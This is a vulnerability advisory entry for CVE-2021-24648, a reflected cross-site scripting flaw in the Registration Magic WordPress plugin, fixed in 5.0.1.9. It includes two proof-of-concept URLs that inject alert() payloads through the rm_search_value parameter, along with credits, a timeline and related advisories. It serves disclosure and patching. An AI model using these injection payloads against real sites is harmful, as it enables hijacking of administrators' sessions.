Registration Magic < 5.0.1.9 – Reflected Cross-Site Scripting | CVE 2021-24648 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the rm_search_value parameter before outputting back in an attribute, leading to a Reflected Cross-Site Scripting

Proof of Concept

v < 5.0.1.2
https://example.com/wp-admin/admin.php?page=rm_login_advanced&rm_search_value="><script>alert(/XSS/)</script>

v < 5.0.1.9
https://example.com/wp-admin/admin.php?page=rm_login_advanced&rm_search_value="%20style=animation-name:rotation%20onanimationstart=alert(/XSS/)//

Affects Plugins

custom-registration-form-builder-with-submission-manager

Fixed in 5.0.1.9

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2646734

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

AyeCode Ltd

Submitter

Stiofan

Submitter website

https://ayecode.io/

Submitter twitter

Verified

Yes

WPVDB ID

a3573212-2a98-4504-b8f4-b4d46655e17c

Timeline

Publicly Published

2021-12-28 (about 2 years ago)

Added

2021-12-28 (about 2 years ago)

Last Updated

2022-04-13 (about 2 years ago)

Other

Published

Title

Published

2017-08-08

Title

Bridge Theme <= 11.1 - DOM Cross-Site Scripting (XSS)

Published

2021-08-18

Title

Gutenslider < 5.2.0 - Contributor+ Stored XSS

Published

2022-10-18

Title

WP Attachments < 5.0.5 - Admin+ Stored Cross-Site Scripting

Published

2011-12-05

Title

Lazyest Backup < 0.2.2 - XSS

Published

2023-05-11

Title

Pinterest RSS Widget <= 2.3.1 - Contributor+ Stored Cross-Site Scripting via shortcode